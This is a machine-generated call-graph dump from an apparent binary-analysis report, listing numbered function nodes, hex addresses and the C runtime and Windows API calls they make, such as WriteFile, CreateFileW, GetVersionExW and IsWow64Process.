___lock_fhandle 59 API calls 105556->105557 105560 1000dde 105557->105560 105565 1000dd0 105558->105565 105561 1000dc8 105559->105561 105563 1000df1 105560->105563 105564 1000e04 105560->105564 105562 ff8b28 _free 58 API calls 105561->105562 105562->105565 105566 1000e5b __read_nolock 70 API calls 105563->105566 105568 ff8b28 _free 58 API calls 105564->105568 105567 ff8db6 __mbschr_l 9 API calls 105565->105567 105569 1000dfd 105566->105569 105567->105553 105570 1000e09 105568->105570 105572 1000e33 __read LeaveCriticalSection 105569->105572 105571 ff8af4 __write 58 API calls 105570->105571 105571->105569 105572->105553 105573->105489 105574->105500 105575->105492 105579 ff520a GetSystemTimeAsFileTime 105576->105579 105578 1038f6e 105578->105171 105580 ff5238 __aulldiv 105579->105580 105580->105578 105582 ff5c6c _fprintf 105581->105582 105583 ff5c7e 105582->105583 105584 ff5c93 105582->105584 105595 ff8b28 58 API calls __getptd_noexit 105583->105595 105585 ff6c11 __lock_file 59 API calls 105584->105585 105587 ff5c99 105585->105587 105597 ff58d0 67 API calls 7 library calls 105587->105597 105588 ff5c83 105596 ff8db6 9 API calls __mbschr_l 105588->105596 105591 ff5ca4 105598 ff5cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 105591->105598 105593 ff5cb6 105594 ff5c8e _fprintf 105593->105594 105594->105176 105595->105588 105596->105594 105597->105591 105598->105593 105599->105060 105600->105062 105601->105058 105602->105068 105604 fd9169 Mailbox 105603->105604 105605 100f19f 105604->105605 105608 fd9173 105604->105608 105606 ff0db6 Mailbox 59 API calls 105605->105606 105610 100f1ab 105606->105610 105607 fd917a 105607->105072 105608->105607 105611 fd9c90 59 API calls Mailbox 105608->105611 105610->105610 105611->105608 105612->105078 105613->105079 105615 1039748 __tzset_nolock _wcscmp 105614->105615 105616 fd4f0b 74 API calls 105615->105616 105617 10395dc 105615->105617 105618 1039109 GetSystemTimeAsFileTime 105615->105618 105619 fd4ee5 85 API calls 105615->105619 105616->105615 105617->105089 105617->105117 105618->105615 105619->105615 105621 1038b11 105620->105621 105624 1038b1f 105620->105624 105622 ff525b 115 API calls 105621->105622 105622->105624 105623 1038b64 105651 1038d91 105623->105651 105624->105623 105625 ff525b 115 API calls 105624->105625 105650 1038b28 105624->105650 105627 1038b49 105625->105627 105627->105623 105629 1038b52 105627->105629 105628 1038ba8 105630 1038bcd 105628->105630 105631 1038bac 105628->105631 105633 ff53a6 __fcloseall 83 API calls 105629->105633 105629->105650 105655 10389a9 105630->105655 105632 1038bb9 105631->105632 105635 ff53a6 __fcloseall 83 API calls 105631->105635 105637 ff53a6 __fcloseall 83 API calls 105632->105637 105632->105650 105633->105650 105635->105632 105637->105650 105638 1038bfb 105664 1038c2b 105638->105664 105639 1038bdb 105640 1038be8 105639->105640 105642 ff53a6 __fcloseall 83 API calls 105639->105642 105644 ff53a6 __fcloseall 83 API calls 105640->105644 105640->105650 105642->105640 105644->105650 105647 1038c16 105649 ff53a6 __fcloseall 83 API calls 105647->105649 105647->105650 105649->105650 105650->105118 105652 1038db6 105651->105652 105654 1038d9f __tzset_nolock _memmove 105651->105654 105653 ff55e2 __fread_nolock 74 API calls 105652->105653 105653->105654 105654->105628 105656 ff571c __crtCompareStringA_stat 58 API calls 105655->105656 105657 10389b8 105656->105657 105658 ff571c __crtCompareStringA_stat 58 API calls 105657->105658 105659 10389cc 105658->105659 105660 ff571c __crtCompareStringA_stat 58 API calls 105659->105660 105661 10389e0 105660->105661 105662 1038d0d 58 API calls 105661->105662 105663 10389f3 105661->105663 105662->105663 105663->105638 105663->105639 105668 1038c40 105664->105668 105665 1038cf8 105697 1038f35 105665->105697 105667 1038a05 74 API calls 105667->105668 105668->105665 105668->105667 105671 1038c02 105668->105671 105693 1038e12 105668->105693 105701 1038aa1 74 API calls 105668->105701 105672 1038d0d 105671->105672 105673 1038d20 105672->105673 105674 1038d1a 105672->105674 105676 1038d31 105673->105676 105677 ff2d55 _free 58 API calls 105673->105677 105675 ff2d55 _free 58 API calls 105674->105675 105675->105673 105678 1038c09 105676->105678 105679 ff2d55 _free 58 API calls 105676->105679 105677->105676 105678->105647 105680 ff53a6 105678->105680 105679->105678 105681 ff53b2 _fprintf 105680->105681 105682 ff53de 105681->105682 105683 ff53c6 105681->105683 105686 ff6c11 __lock_file 59 API calls 105682->105686 105690 ff53d6 _fprintf 105682->105690 105750 ff8b28 58 API calls __getptd_noexit 105683->105750 105685 ff53cb 105751 ff8db6 9 API calls __mbschr_l 105685->105751 105688 ff53f0 105686->105688 105734 ff533a 105688->105734 105690->105647 105694 1038e61 105693->105694 105696 1038e21 105693->105696 105694->105696 105702 1038ee8 105694->105702 105696->105668 105698 1038f42 105697->105698 105699 1038f53 105697->105699 105700 ff4863 80 API calls 105698->105700 105699->105671 105700->105699 105701->105668 105703 1038f14 105702->105703 105704 1038f25 105702->105704 105706 ff4863 105703->105706 105704->105694 105707 ff486f _fprintf 105706->105707 105708 ff488d 105707->105708 105709 ff48a5 105707->105709 105711 ff489d _fprintf 105707->105711 105731 ff8b28 58 API calls __getptd_noexit 105708->105731 105712 ff6c11 __lock_file 59 API calls 105709->105712 105711->105704 105714 ff48ab 105712->105714 105713 ff4892 105732 ff8db6 9 API calls __mbschr_l 105713->105732 105719 ff470a 105714->105719 105722 ff4719 105719->105722 105725 ff4737 105719->105725 105720 ff4727 105721 ff8b28 _free 58 API calls 105720->105721 105723 ff472c 105721->105723 105722->105720 105722->105725 105730 ff4751 _memmove 105722->105730 105724 ff8db6 __mbschr_l 9 API calls 105723->105724 105724->105725 105733 ff48dd LeaveCriticalSection LeaveCriticalSection __wfsopen 105725->105733 105726 ffae1e __flsbuf 78 API calls 105726->105730 105727 ff4a3d __flush 78 API calls 105727->105730 105728 ff46e6 __output_l 58 API calls 105728->105730 105729 ffd886 __write 78 API calls 105729->105730 105730->105725 105730->105726 105730->105727 105730->105728 105730->105729 105731->105713 105732->105711 105733->105711 105735 ff5349 105734->105735 105738 ff535d 105734->105738 105789 ff8b28 58 API calls __getptd_noexit 105735->105789 105737 ff5359 105752 ff5415 LeaveCriticalSection LeaveCriticalSection __wfsopen 105737->105752 105738->105737 105753 ff4a3d 105738->105753 105739 ff534e 105790 ff8db6 9 API calls __mbschr_l 105739->105790 105745 ff46e6 __output_l 58 API calls 105746 ff5377 105745->105746 105763 1000a02 105746->105763 105748 ff537d 105748->105737 105749 ff2d55 _free 58 API calls 105748->105749 105749->105737 105750->105685 105751->105690 105752->105690 105754 ff4a50 105753->105754 105758 ff4a74 105753->105758 105755 ff46e6 __output_l 58 API calls 105754->105755 105754->105758 105756 ff4a6d 105755->105756 105791 ffd886 105756->105791 105759 1000b77 105758->105759 105760 ff5371 105759->105760 105761 1000b84 105759->105761 105760->105745 105761->105760 105762 ff2d55 _free 58 API calls 105761->105762 105762->105760 105764 1000a0e _fprintf 105763->105764 105765 1000a32 105764->105765 105766 1000a1b 105764->105766 105767 1000abd 105765->105767 105769 1000a42 105765->105769 105916 ff8af4 58 API calls __getptd_noexit 105766->105916 105921 ff8af4 58 API calls __getptd_noexit 105767->105921 105772 1000a60 105769->105772 105773 1000a6a 105769->105773 105771 1000a20 105917 ff8b28 58 API calls __getptd_noexit 105771->105917 105918 ff8af4 58 API calls __getptd_noexit 105772->105918 105778 ffd206 ___lock_fhandle 59 API calls 105773->105778 105774 1000a65 105922 ff8b28 58 API calls __getptd_noexit 105774->105922 105776 1000a27 _fprintf 105776->105748 105780 1000a70 105778->105780 105782 1000a83 105780->105782 105783 1000a8e 105780->105783 105781 1000ac9 105923 ff8db6 9 API calls __mbschr_l 105781->105923 105901 1000add 105782->105901 105919 ff8b28 58 API calls __getptd_noexit 105783->105919 105787 1000a89 105920 1000ab5 LeaveCriticalSection __unlock_fhandle 105787->105920 105789->105739 105790->105737 105792 ffd892 _fprintf 105791->105792 105793 ffd89f 105792->105793 105794 ffd8b6 105792->105794 105892 ff8af4 58 API calls __getptd_noexit 105793->105892 105795 ffd955 105794->105795 105797 ffd8ca 105794->105797 105898 ff8af4 58 API calls __getptd_noexit 105795->105898 105800 ffd8e8 105797->105800 105801 ffd8f2 105797->105801 105799 ffd8a4 105893 ff8b28 58 API calls __getptd_noexit 105799->105893 105894 ff8af4 58 API calls __getptd_noexit 105800->105894 105819 ffd206 105801->105819 105802 ffd8ed 105899 ff8b28 58 API calls __getptd_noexit 105802->105899 105804 ffd8ab _fprintf 105804->105758 105807 ffd8f8 105809 ffd91e 105807->105809 105810 ffd90b 105807->105810 105895 ff8b28 58 API calls __getptd_noexit 105809->105895 105828 ffd975 105810->105828 105811 ffd961 105900 ff8db6 9 API calls __mbschr_l 105811->105900 105815 ffd923 105896 ff8af4 58 API calls __getptd_noexit 105815->105896 105817 ffd917 105897 ffd94d LeaveCriticalSection __unlock_fhandle 105817->105897 105820 ffd212 _fprintf 105819->105820 105821 ffd261 EnterCriticalSection 105820->105821 105822 ff9c0b __lock 58 API calls 105820->105822 105823 ffd287 _fprintf 105821->105823 105824 ffd237 105822->105824 105823->105807 105825 ffd24f 105824->105825 105827 ff9e2b __mtinitlocks InitializeCriticalSectionAndSpinCount 105824->105827 105826 ffd28b ___lock_fhandle LeaveCriticalSection 105825->105826 105826->105821 105827->105825 105829 ffd982 __ftell_nolock 105828->105829 105830 ffd9c1 105829->105830 105831 ffd9e0 105829->105831 105863 ffd9b6 105829->105863 105833 ff8af4 __write 58 API calls 105830->105833 105834 ffda1c 105831->105834 105835 ffda38 105831->105835 105832 ffc5f6 __woutput_l 6 API calls 105836 ffe1d6 105832->105836 105837 ffd9c6 105833->105837 105838 ff8af4 __write 58 API calls 105834->105838 105840 ffda51 105835->105840 105843 10018c1 __lseeki64_nolock 60 API calls 105835->105843 105836->105817 105839 ff8b28 _free 58 API calls 105837->105839 105841 ffda21 105838->105841 105842 ffd9cd 105839->105842 105844 1005c6b __stbuf 58 API calls 105840->105844 105845 ff8b28 _free 58 API calls 105841->105845 105846 ff8db6 __mbschr_l 9 API calls 105842->105846 105843->105840 105847 ffda5f 105844->105847 105848 ffda28 105845->105848 105846->105863 105849 ffddb8 105847->105849 105853 ff99ac _LocaleUpdate::_LocaleUpdate 58 API calls 105847->105853 105852 ff8db6 __mbschr_l 9 API calls 105848->105852 105850 ffe14b WriteFile 105849->105850 105851 ffddd6 105849->105851 105854 ffddab GetLastError 105850->105854 105865 ffdd78 105850->105865 105855 ffdefa 105851->105855 105862 ffddec 105851->105862 105852->105863 105856 ffda8b GetConsoleMode 105853->105856 105854->105865 105858 ffdf05 105855->105858 105867 ffdfef 105855->105867 105856->105849 105859 ffdaca 105856->105859 105857 ffe184 105857->105863 105864 ff8b28 _free 58 API calls 105857->105864 105858->105857 105873 ffdf6a WriteFile 105858->105873 105859->105849 105860 ffdada GetConsoleCP 105859->105860 105860->105857 105888 ffdb09 105860->105888 105861 ffde5b WriteFile 105861->105854 105868 ffde98 105861->105868 105862->105857 105862->105861 105863->105832 105869 ffe1b2 105864->105869 105865->105857 105865->105863 105866 ffded8 105865->105866 105870 ffe17b 105866->105870 105871 ffdee3 105866->105871 105867->105857 105872 ffe064 WideCharToMultiByte 105867->105872 105868->105862 105880 ffdebc 105868->105880 105874 ff8af4 __write 58 API calls 105869->105874 105876 ff8b07 __dosmaperr 58 API calls 105870->105876 105875 ff8b28 _free 58 API calls 105871->105875 105872->105854 105885 ffe0ab 105872->105885 105873->105854 105877 ffdfb9 105873->105877 105874->105863 105878 ffdee8 105875->105878 105876->105863 105877->105858 105877->105865 105877->105880 105881 ff8af4 __write 58 API calls 105878->105881 105879 ffe0b3 WriteFile 105883 ffe106 GetLastError 105879->105883 105879->105885 105880->105865 105881->105863 105882 ff35f5 __write_nolock 58 API calls 105882->105888 105883->105885 105884 10062ba 60 API calls __write_nolock 105884->105888 105885->105865 105885->105867 105885->105879 105885->105880 105886 1007a5e WriteConsoleW CreateFileW __putwch_nolock 105890 ffdc5f 105886->105890 105887 ffdbf2 WideCharToMultiByte 105887->105865 105889 ffdc2d WriteFile 105887->105889 105888->105865 105888->105882 105888->105884 105888->105887 105888->105890 105889->105854 105889->105890 105890->105854 105890->105865 105890->105886 105890->105888 105891 ffdc87 WriteFile 105890->105891 105891->105854 105891->105890 105892->105799 105893->105804 105894->105802 105895->105815 105896->105817 105897->105804 105898->105802 105899->105811 105900->105804 105924 ffd4c3 105901->105924 105903 1000b41 105937 ffd43d 59 API calls 2 library calls 105903->105937 105905 1000aeb 105905->105903 105906 1000b1f 105905->105906 105909 ffd4c3 __lseek_nolock 58 API calls 105905->105909 105906->105903 105907 ffd4c3 __lseek_nolock 58 API calls 105906->105907 105911 1000b2b CloseHandle 105907->105911 105908 1000b49 105912 1000b6b 105908->105912 105938 ff8b07 58 API calls 2 library calls 105908->105938 105910 1000b16 105909->105910 105913 ffd4c3 __lseek_nolock 58 API calls 105910->105913 105911->105903 105914 1000b37 GetLastError 105911->105914 105912->105787 105913->105906 105914->105903 105916->105771 105917->105776 105918->105774 105919->105787 105920->105776 105921->105774 105922->105781 105923->105776 105925 ffd4ce 105924->105925 105927 ffd4e3 105924->105927 105926 ff8af4 __write 58 API calls 105925->105926 105929 ffd4d3 105926->105929 105928 ff8af4 __write 58 API calls 105927->105928 105930 ffd508 105927->105930 105931 ffd512 105928->105931 105932 ff8b28 _free 58 API calls 105929->105932 105930->105905 105933 ff8b28 _free 58 API calls 105931->105933 105934 ffd4db 105932->105934 105935 ffd51a 105933->105935 105934->105905 105936 ff8db6 __mbschr_l 9 API calls 105935->105936 105936->105934 105937->105908 105938->105912 105940 ff079e __ftell_nolock 105939->105940 105941 ff079f GetLongPathNameW 105940->105941 105942 fd7bcc 59 API calls 105941->105942 105943 fd72bd 105942->105943 105944 fd700b 105943->105944 105945 fd7667 59 API calls 105944->105945 105946 fd701d 105945->105946 105947 fd4750 60 API calls 105946->105947 105948 fd7028 105947->105948 105949 100e885 105948->105949 105950 fd7033 105948->105950 105954 100e89f 105949->105954 105997 fd7908 61 API calls 105949->105997 105952 fd3f74 59 API calls 105950->105952 105953 fd703f 105952->105953 105991 fd34c2 105953->105991 105956 fd7052 Mailbox 105956->104889 105958 fd4ddd 136 API calls 105957->105958 105959 fd688f 105958->105959 105960 100e031 105959->105960 105962 fd4ddd 136 API calls 105959->105962 105961 103955b 122 API calls 105960->105961 105963 100e046 105961->105963 105964 fd68a3 105962->105964 105965 100e067 105963->105965 105966 100e04a 105963->105966 105964->105960 105967 fd68ab 105964->105967 105969 ff0db6 Mailbox 59 API calls 105965->105969 105968 fd4e4a 84 API calls 105966->105968 105970 100e052 105967->105970 105971 fd68b7 105967->105971 105968->105970 105982 100e0ac Mailbox 105969->105982 106105 10342f8 90 API calls _wprintf 105970->106105 105998 fd6a8c 105971->105998 105974 100e060 105974->105965 105976 100e260 105977 ff2d55 _free 58 API calls 105976->105977 105978 100e268 105977->105978 105979 fd4e4a 84 API calls 105978->105979 105985 100e271 105979->105985 105982->105976 105982->105985 105988 fd7de1 59 API calls 105982->105988 106091 fd750f 105982->106091 106099 fd735d 105982->106099 106106 102f73d 59 API calls 2 library calls 105982->106106 106107 102f65e 61 API calls 2 library calls 105982->106107 106108 103737f 59 API calls Mailbox 105982->106108 105984 ff2d55 _free 58 API calls 105984->105985 105985->105984 105987 fd4e4a 84 API calls 105985->105987 106109 102f7a1 89 API calls 4 library calls 105985->106109 105987->105985 105988->105982 105992 fd34d4 105991->105992 105996 fd34f3 _memmove 105991->105996 105995 ff0db6 Mailbox 59 API calls 105992->105995 105993 ff0db6 Mailbox 59 API calls 105994 fd350a 105993->105994 105994->105956 105995->105996 105996->105993 105997->105949 105999 fd6ab5 105998->105999 106000 100e41e 105998->106000 106115 fd57a6 60 API calls Mailbox 105999->106115 106201 102f7a1 89 API calls 4 library calls 106000->106201 106003 fd6ad7 106116 fd57f6 106003->106116 106004 100e431 106202 102f7a1 89 API calls 4 library calls 106004->106202 106007 fd6af4 106009 fd7667 59 API calls 106007->106009 106011 fd6b00 106009->106011 106010 100e44d 106012 fd6b61 106010->106012 106129 ff0957 60 API calls __ftell_nolock 106011->106129 106014 100e460 106012->106014 106015 fd6b6f 106012->106015 106017 fd5c6f CloseHandle 106014->106017 106018 fd7667 59 API calls 106015->106018 106016 fd6b0c 106019 fd7667 59 API calls 106016->106019 106020 100e46c 106017->106020 106021 fd6b78 106018->106021 106022 fd6b18 106019->106022 106023 fd4ddd 136 API calls 106020->106023 106024 fd7667 59 API calls 106021->106024 106025 fd4750 60 API calls 106022->106025 106026 100e488 106023->106026 106027 fd6b81 106024->106027 106028 fd6b26 106025->106028 106030 100e4b1 106026->106030 106033 103955b 122 API calls 106026->106033 106139 fd459b 106027->106139 106130 fd5850 ReadFile SetFilePointerEx 106028->106130 106203 102f7a1 89 API calls 4 library calls 106030->106203 106032 fd6b52 106131 fd5aee 106032->106131 106037 100e4a4 106033->106037 106040 100e4ac 106037->106040 106041 100e4cd 106037->106041 106039 100e4c8 106048 fd6d0c Mailbox 106039->106048 106043 fd4e4a 84 API calls 106040->106043 106044 fd4e4a 84 API calls 106041->106044 106043->106030 106045 100e4d2 106044->106045 106046 ff0db6 Mailbox 59 API calls 106045->106046 106054 100e506 106046->106054 106110 fd57d4 106048->106110 106051 fd3bbb 106051->104748 106051->104757 106055 fd750f 59 API calls 106054->106055 106087 100e54f Mailbox 106055->106087 106059 100e740 106208 10372df 59 API calls Mailbox 106059->106208 106064 100e762 106209 104fbce 59 API calls 2 library calls 106064->106209 106067 100e76f 106068 ff2d55 _free 58 API calls 106067->106068 106068->106048 106073 fd750f 59 API calls 106073->106087 106081 fd7de1 59 API calls 106081->106087 106085 100e792 106210 102f7a1 89 API calls 4 library calls 106085->106210 106087->106059 106087->106073 106087->106081 106087->106085 106204 102f73d 59 API calls 2 library calls 106087->106204 106205 102f65e 61 API calls 2 library calls 106087->106205 106206 103737f 59 API calls Mailbox 106087->106206 106207 fd7213 59 API calls Mailbox 106087->106207 106088 100e7ab 106089 ff2d55 _free 58 API calls 106088->106089 106090 100e7be 106089->106090 106090->106048 106092 fd75af 106091->106092 106096 fd7522 _memmove 106091->106096 106094 ff0db6 Mailbox 59 API calls 106092->106094 106093 ff0db6 Mailbox 59 API calls 106095 fd7529 106093->106095 106094->106096 106097 ff0db6 Mailbox 59 API calls 106095->106097 106098 fd7552 106095->106098 106096->106093 106097->106098 106098->105982 106100 fd7370 106099->106100 106104 fd741e 106099->106104 106102 ff0db6 Mailbox 59 API calls 106100->106102 106103 fd73a2 106100->106103 106101 ff0db6 59 API calls Mailbox 106101->106103 106102->106103 106103->106101 106103->106104 106104->105982 106105->105974 106106->105982 106107->105982 106108->105982 106109->105985 106111 fd5c6f CloseHandle 106110->106111 106112 fd57dc Mailbox 106111->106112 106113 fd5c6f CloseHandle 106112->106113 106114 fd57eb 106113->106114 106114->106051 106115->106003 106117 fd5c6f CloseHandle 106116->106117 106118 fd5802 106117->106118 106213 fd5c99 106118->106213 106120 fd5844 106120->106004 106120->106007 106121 fd5821 106121->106120 106221 fd5610 106121->106221 106123 fd5833 106238 fd527b SetFilePointerEx SetFilePointerEx 106123->106238 106125 fd583a 106125->106120 106126 100dc07 106125->106126 106239 103345a SetFilePointerEx SetFilePointerEx WriteFile 106126->106239 106128 100dc37 106128->106120 106129->106016 106130->106032 106132 fd5b08 106131->106132 106133 fd5b8f SetFilePointerEx 106132->106133 106134 100dd28 106132->106134 106138 fd5b63 106132->106138 106245 fd5c4e SetFilePointerEx 106133->106245 106246 fd5c4e SetFilePointerEx 106134->106246 106137 100dd42 106138->106012 106140 fd7667 59 API calls 106139->106140 106141 fd45b1 106140->106141 106142 fd7667 59 API calls 106141->106142 106143 fd45b9 106142->106143 106144 fd7667 59 API calls 106143->106144 106145 fd45c1 106144->106145 106146 fd7667 59 API calls 106145->106146 106147 fd45c9 106146->106147 106148 fd45fd 106147->106148 106149 100d4d2 106147->106149 106150 fd784b 59 API calls 106148->106150 106151 fd8047 59 API calls 106149->106151 106152 fd460b 106150->106152 106153 100d4db 106151->106153 106154 fd7d2c 59 API calls 106152->106154 106155 fd7d8c 59 API calls 106153->106155 106156 fd4615 106154->106156 106158 fd4640 106155->106158 106157 fd784b 59 API calls 106156->106157 106156->106158 106160 fd4636 106157->106160 106161 fd465f 106158->106161 106162 100d4fb 106158->106162 106176 fd4680 106158->106176 106164 fd7d2c 59 API calls 106160->106164 106166 fd79f2 59 API calls 106161->106166 106165 100d5cb 106162->106165 106173 100d5b4 106162->106173 106183 100d532 106162->106183 106163 fd4691 106169 fd8047 59 API calls 106163->106169 106170 fd46a3 106163->106170 106164->106158 106167 fd7bcc 59 API calls 106165->106167 106168 fd4669 106166->106168 106185 100d588 106167->106185 106175 fd784b 59 API calls 106168->106175 106168->106176 106169->106170 106171 fd46b3 106170->106171 106172 fd8047 59 API calls 106170->106172 106174 fd46ba 106171->106174 106177 fd8047 59 API calls 106171->106177 106172->106171 106173->106165 106179 100d59f 106173->106179 106175->106176 106247 fd784b 106176->106247 106177->106174 106181 fd7bcc 59 API calls 106179->106181 106180 100d590 106182 fd7bcc 59 API calls 106180->106182 106181->106185 106182->106185 106183->106180 106188 100d57b 106183->106188 106184 fd79f2 59 API calls 106184->106185 106185->106176 106185->106184 106260 fd7924 59 API calls 2 library calls 106185->106260 106189 fd7bcc 59 API calls 106188->106189 106189->106185 106201->106004 106202->106010 106203->106039 106204->106087 106205->106087 106206->106087 106207->106087 106208->106064 106209->106067 106210->106088 106214 100dd58 106213->106214 106215 fd5cb2 CreateFileW 106213->106215 106216 fd5cd4 106214->106216 106217 100dd5e CreateFileW 106214->106217 106215->106216 106216->106121 106217->106216 106218 100dd84 106217->106218 106219 fd5aee 2 API calls 106218->106219 106220 100dd8f 106219->106220 106220->106216 106222 100dba5 106221->106222 106223 fd562b 106221->106223 106237 fd56ba 106222->106237 106240 fd5cdf 106222->106240 106224 fd5aee 2 API calls 106223->106224 106223->106237 106225 fd564d 106224->106225 106226 fd522e 59 API calls 106225->106226 106228 fd5657 106226->106228 106228->106222 106229 fd5664 106228->106229 106230 ff0db6 Mailbox 59 API calls 106229->106230 106231 fd566f 106230->106231 106232 fd522e 59 API calls 106231->106232 106233 fd567a 106232->106233 106234 fd5bc0 2 API calls 106233->106234 106235 fd56a7 106234->106235 106236 fd5aee 2 API calls 106235->106236 106236->106237 106237->106123 106238->106125 106239->106128 106241 fd5aee 2 API calls 106240->106241 106242 fd5d00 106241->106242 106243 fd5aee 2 API calls 106242->106243 106244 fd5d14 106243->106244 106244->106237 106245->106138 106246->106137 106248 fd785a 106247->106248 106249 fd78b7 106247->106249 106248->106249 106251 fd7865 106248->106251 106250 fd7d2c 59 API calls 106249->106250 106252 fd7888 _memmove 106250->106252 106253 100eb09 106251->106253 106254 fd7880 106251->106254 106252->106163 106256 fd8029 59 API calls 106253->106256 106261 fd7f27 59 API calls Mailbox 106254->106261 106257 100eb13 106256->106257 106258 ff0db6 Mailbox 59 API calls 106257->106258 106259 100eb33 106258->106259 106260->106185 106261->106252 106263 fd6d95 106262->106263 106269 fd6ea9 106262->106269 106264 ff0db6 Mailbox 59 API calls 106263->106264 106263->106269 106266 fd6dbc 106264->106266 106265 ff0db6 Mailbox 59 API calls 106267 fd6e31 106265->106267 106266->106265 106267->106269 106271 fd735d 59 API calls 106267->106271 106272 fd750f 59 API calls 106267->106272 106275 fd6240 106267->106275 106300 1026553 59 API calls Mailbox 106267->106300 106269->104895 106271->106267 106272->106267 106273->104897 106274->104899 106276 fd7a16 59 API calls 106275->106276 106300->106267 106804 fd1066 106809 fdf76f 106804->106809 106806 fd106c 106807 ff2d40 __cinit 67 API calls 106806->106807 106808 fd1076 106807->106808 106810 fdf790 106809->106810 106842 feff03 106810->106842 106814 fdf7d7 106815 fd7667 59 API calls 106814->106815 106816 fdf7e1 106815->106816 106817 fd7667 59 API calls 106816->106817 106818 fdf7eb 106817->106818 106819 fd7667 59 API calls 106818->106819 106820 fdf7f5 106819->106820 106821 fd7667 59 API calls 106820->106821 106822 fdf833 106821->106822 106823 fd7667 59 API calls 106822->106823 106824 fdf8fe 106823->106824 106852 fe5f87 106824->106852 106828 fdf930 106829 fd7667 59 API calls 106828->106829 106830 fdf93a 106829->106830 106880 fefd9e 106830->106880 106832 fdf981 106833 fdf991 GetStdHandle 106832->106833 106834 fdf9dd 106833->106834 106835 10145ab 106833->106835 106836 fdf9e5 OleInitialize 106834->106836 106835->106834 106837 10145b4 106835->106837 106836->106806 106887 1036b38 64 API calls Mailbox 106837->106887 106839 10145bb 106888 1037207 CreateThread 106839->106888 106841 10145c7 CloseHandle 106841->106836 106889 feffdc 106842->106889 106845 feffdc 59 API calls 106846 feff45 106845->106846 106847 fd7667 59 API calls 106846->106847 106848 feff51 106847->106848 106849 fd7bcc 59 API calls 106848->106849 106850 fdf796 106849->106850 106851 ff0162 6 API calls 106850->106851 106851->106814 106853 fd7667 59 API calls 106852->106853 106854 fe5f97 106853->106854 106855 fd7667 59 API calls 106854->106855 106856 fe5f9f 106855->106856 106896 fe5a9d 106856->106896 106859 fe5a9d 59 API calls 106860 fe5faf 106859->106860 106861 fd7667 59 API calls 106860->106861 106862 fe5fba 106861->106862 106863 ff0db6 Mailbox 59 API calls 106862->106863 106864 fdf908 106863->106864 106865 fe60f9 106864->106865 106866 fe6107 106865->106866 106867 fd7667 59 API calls 106866->106867 106868 fe6112 106867->106868 106869 fd7667 59 API calls 106868->106869 106870 fe611d 106869->106870 106871 fd7667 59 API calls 106870->106871 106872 fe6128 106871->106872 106873 fd7667 59 API calls 106872->106873 106874 fe6133 106873->106874 106875 fe5a9d 59 API calls 106874->106875 106876 fe613e 106875->106876 106877 ff0db6 Mailbox 59 API calls 106876->106877 106878 fe6145 RegisterWindowMessageW 106877->106878 106878->106828 106881 fefdae 106880->106881 106882 102576f 106880->106882 106884 ff0db6 Mailbox 59 API calls 106881->106884 106899 1039ae7 60 API calls 106882->106899 106886 fefdb6 106884->106886 106885 102577a 106886->106832 106887->106839 106888->106841 106900 10371ed 65 API calls 106888->106900 106890 fd7667 59 API calls 106889->106890 106891 feffe7 106890->106891 106892 fd7667 59 API calls 106891->106892 106893 feffef 106892->106893 106894 fd7667 59 API calls 106893->106894 106895 feff3b 106894->106895 106895->106845 106897 fd7667 59 API calls 106896->106897 106898 fe5aa5 106897->106898 106898->106859 106899->106885 106901 fd1016 106906 fd4974 106901->106906 106904 ff2d40 __cinit 67 API calls 106905 fd1025 106904->106905 106907 ff0db6 Mailbox 59 API calls 106906->106907 106908 fd497c 106907->106908 106909 fd101b 106908->106909 106913 fd4936 106908->106913 106909->106904 106914 fd493f 106913->106914 106915 fd4951 106913->106915 106916 ff2d40 __cinit 67 API calls 106914->106916 106917 fd49a0 106915->106917 106916->106915 106918 fd7667 59 API calls 106917->106918 106919 fd49b8 GetVersionExW 106918->106919 106920 fd7bcc 59 API calls 106919->106920 106921 fd49fb 106920->106921 106922 fd7d2c 59 API calls 106921->106922 106929 fd4a28 106921->106929 106923 fd4a1c 106922->106923 106924 fd7726 59 API calls 106923->106924 106924->106929 106925 fd4a93 GetCurrentProcess IsWow64Process 106926 fd4aac 106925->106926 106927 fd4b2b GetSystemInfo 106926->106927 106928 fd4ac2 106926->106928 106932 fd4af8 106927->106932 106941 fd4b37 106928->106941 106929->106925 106930 100d864 106929->106930 106932->106909 106934 fd4b1f GetSystemInfo 106937 fd4ae9 106934->106937 106935 fd4ad4 106936 fd4b37 2 API calls 106935->106936 106938 fd4adc GetNativeSystemInfo 106936->106938 106937->106932 106939 fd4aef FreeLibrary 106937->106939 106938->106937 106939->106932 106942 fd4ad0 106941->106942 106943 fd4b40 LoadLibraryA 106941->106943 106942->106934 106942->106935 106943->106942 106944 fd4b51 GetProcAddress 106943->106944 106944->106942 106945 100fdfc 106970 fdab30 Mailbox _memmove 106945->106970 106947 102617e Mailbox 59 API calls 106968 fda057 106947->106968 106949 fdb525 107134 1039e4a 89 API calls 4 library calls 106949->107134 106952 1010055 107133 1039e4a 89 API calls 4 library calls 106952->107133 106955 fdb475 106961 fd8047 59 API calls 106955->106961 106957 fda55a 107137 1039e4a 89 API calls 4 library calls 106957->107137 106958 1010064 106959 ff0db6 59 API calls Mailbox 106969 fd9f37 Mailbox 106959->106969 106960 fd8047 59 API calls 106960->106969 106961->106968 106963 fdb47a 106963->106952 106975 10109e5 106963->106975 106966 fd7667 59 API calls 106966->106969 106967 1026e8f 59 API calls 106967->106969 106969->106952 106969->106955 106969->106957 106969->106959 106969->106960 106969->106963 106969->106966 106969->106967 106969->106968 106971 ff2d40 67 API calls __cinit 106969->106971 106973 10109d6 106969->106973 107126 fdc8c0 341 API calls 2 library calls 106969->107126 107127 fdb900 60 API calls Mailbox 106969->107127 106970->106949 106970->106968 106970->106969 106972 fd7de1 59 API calls 106970->106972 106976 104bc6b 341 API calls 106970->106976 106978 ff0db6 59 API calls Mailbox 106970->106978 106979 fdb2b6 106970->106979 106981 fd9ea0 341 API calls 106970->106981 106982 101086a 106970->106982 106984 1010878 106970->106984 106986 101085c 106970->106986 106987 fdb21c 106970->106987 106991 1026e8f 59 API calls 106970->106991 106995 103d07b 106970->106995 107042 104df23 106970->107042 107045 fe1fc3 106970->107045 107085 104c2e0 106970->107085 107117 1037956 106970->107117 107123 102617e 106970->107123 107128 fd9c90 59 API calls Mailbox 106970->107128 107132 104c193 85 API calls 2 library calls 106970->107132 106971->106969 106972->106970 107138 1039e4a 89 API calls 4 library calls 106973->107138 107139 1039e4a 89 API calls 4 library calls 106975->107139 106976->106970 106978->106970 107131 fdf6a3 341 API calls 106979->107131 106981->106970 107135 fd9c90 59 API calls Mailbox 106982->107135 107136 1039e4a 89 API calls 4 library calls 